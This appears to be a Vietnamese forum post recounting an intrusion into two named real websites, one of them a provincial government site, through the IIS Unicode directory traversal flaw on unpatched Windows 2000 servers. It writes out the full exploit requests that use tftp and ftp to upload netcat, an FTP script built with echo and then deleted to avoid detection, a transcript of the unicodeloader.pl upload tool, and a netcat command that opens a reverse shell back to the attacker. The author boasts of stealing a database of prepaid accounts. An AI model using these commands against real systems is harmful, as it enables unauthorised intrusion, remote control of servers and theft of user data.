Qua nghiên cứu cách upload/download file trên một số Server khi tìm cách hack website
http://www.cantho1260.net/ và
http://www.cantho.gov.vn/ sử dụng Windows 2000 Server chưa patch lỗi thì tôi nhận thấy có một số kinh nghiệm sau đây xin viết vài dòng để chia sẻ cùng với anh em và nếu có thiếu xót xin bổ sung cho. Để Upload netcat lên dùng TFTP thì đơn giản, nhưng trước tiên chúng ta phải cài TFTP server trên system (203.162.30.219). Sau đó cho thi hành các lệnh sau đây trên system của Victim bằng cách dùng một số lỗi như System Traversal của Unicode Exploit chẳng hạn:
GET /scripts/..%c0%af…/winnt/system32/tftp.exe?”-1”+203.162.30.219+GET+nc.exe C:\nc.exe HTTP/1.0
Ví dụ trên sẽ trỏ đến C:\ vì đây là thư mục mà ai cũng có thể Write vào được không có Permit phải là Admin hay không. Nếu Netcat đã có sẵn bạn sẽ nhận được một thông báo là “tftp.exe: can’t write to C:\nc.exe”, nhưng nếu thành công thì Browser sẽ trả về lỗi “HTTP 502 Gateway Error” và một Message là: “ Transfer successful: 59392 byte in x second, 59392 bytes/3s.” Dùng FTP thì hơi nhọc công hơn vì phải qua một trung gian, hãy tạo một file tên gì cũng được trên máy Victim để dùng FTP script với command là –s: [filename] sau đó Script sẽ giúp cho FTP Clien connect đến máy chúng ta để download netcat về local của Host. Trước khi tạo file này chúng ta chắc chắn là sẽ bị cản trở. Và để vượt qua thì có một mẹo nhỏ là hãy copy đổi tên file cmd.exe thành một tên khác trước đã.
GET /scripts/..%c0%af.../winnt/system32/cmd.exe?+/c+copy+c:\winnt\system32\cmd.exe+c:\aclatinh.exe HTTP/1.0
OK! File cmd.exe bây giờ đã được copy sang một bản khác có tên là aclatinh.exe, bây giờ chúng ta lại phải ghi vào C:\ vì như đã nói là đây là nơi mà bất cứ ai cũng có thể write vào. Bây giờ phải tạo một file FTP script bằng cách dùng lệnh echo. Sau đây là một nội dung của một file Script, chúng ta sẽ chọn tên file là ftpaclatinh và username của FTP là anonymous, password là
a@a.com, FTP server là 192.168.2.31.
GET /scripts/...%0c%af../aclatinh.exe?+/c+echo+anonymous>C:\ftpaclatinh&&echo+a@a.com>C:\ftpaclatinh&echo+ bin>>C:\ftpaclatinh&&echo+get+test.txt+C:\nc.exe>>C:\ftpacla tinh&&echo+Bye>>C:\ftpaclatinh&&ftp+s:C:\ftpaclatinh+192.168.234.31&&del+C:\ftpaclatinh
OK! Sau khi thực hiện script trên nó sẽ copy netcat đến C:\ trên Server và xóa luôn file script ftpaclatinh để tránh bị phát hiện. Nhưng lưu ý là từ dòng thứ 2 phải dùng “>>”để bố sung thêm vào ftpaclatinh chứ không phải là “>”.
_ Tạo file bằng lệnh echo: Dĩ nhiên là nếu FTP và TFTP không có sẵn, trường hợp này chỉ xảy ra đối với một số admin có tính “tào tháo” hay bị Block bởi firewall chẳng hạn thì chúng ta phải dùng lệnh Echo để gõ từng dòng lệnh vào ví dụ như là nội dung của file cmd.asp chẳng hạn thì cách làm như sau: để tạo file thì gõ vào “echo nộidung > c:\tenfile & vol” và để thêm nội dung vào file trên thì gõ vào: echo nộidung >> c:\tenfile & vol và cứ thế tuy lâu nhưng còn hơn không làm được gì. Và một hacker có tên là Relof Temmingh cũng có viết sẵn một Scritp cho Unicode Exploit dưới dạng ngôn ngữ Perl có tên là “cgidecodeloader.pl” cũng dùng cách echo và gián tiếp để tạo ra 2 file là upload.asp và upload.inc cho phép upload dựa trên Browser thuận tiện (và ông ta cũng có viết một Script là “unicodeexcute.pl” cho phép hacker thi hành lệnh từ xa). Dùng unicodeloder.pl thì trước tiên phải chắc chắn là hai file upload.asp và upload.inc phải có cùng trong thư mục chứa file unicodeloader.pl và cần xác định thư mục nào của Server cho phép Writable và excutable đã thường thì nó là C:\intetpub\scripts, là default khi install Windows2000.
C:\>Perl unicodeloader.pl
Usage: unicodeloader IP:port webroot
C:\>Perl unicodeloader.pl cantho1260.net:80 C:\inetpub\scripts
Creating uploading webpage on victim.com on port 80.
The webroot is C:\inetpub\scripts.
testing directory /scripts/..%c0%af../winnt/system32/cmd.exe?/c
farmer brown directory: c:\inetpub\scripts
'-au' is not recognized as an internal or external command,
operable program or batch file.
sensepost.exe found on system
uploading ASP section:
..............
uploading the INC section: (this may take a while)
.................................................................................
upload page created.
Now simply surf to caesars/upload.asp and enjoy.
Files will be uploaded to C:\inetpub\scripts
Và chúng ta hãy khảo xác cách nó làm việc. Trước tiên nó sẽ copy cmd.exe thành một file có tên là “sensepost.exe” đến thư mục đã xác định là Webroot, ở đây là C:\Intetpub\scripts\ sau đó nó bypass qua cmd.exe gián tiếp (“>”) qua exploit . và sensepost.exe được dùng để echo và gián tiếp 2 file upload.asp va upload.inc từng dòng mã một trong hai file để vào thư mục Wroot (ở đây là C:\Inetpub\script) và bây giờ thì hai file trên đã có mặt trên Server chỉ cần trỏ Browser đến đó để upload cmd.asp và ntdaddy.asp mà thôi.
http://www.cantho1260.net/scripts/upload.asp http://www.cantho1260.net/scripts/cmdasp.aspKhi đã Upload Netcat (nc.exe) rồi thì chúng ta sẽ cho netcat listen trên máy của mình:
C:\nc.exe –l –p 2002
Và sau đó dùng lại dùng cmd để shovel Netcat listenning trở về máy ta bằng cách thi hành Netcat trên Server thông qua Cmd.asp qua Browser:
C:\inetpub\scripts\nc.exe –v –e cmd.exe cantho1260.net 2002
Tuy thế nhưng tôi chỉ kịp download về mỗi một file Access chứa account prepaid thôi thì Server nó đã Fix lại rồi. Đến nay thì file đó cũng bị Broke hư mất khi defrag đĩa cứng! Uổng quá!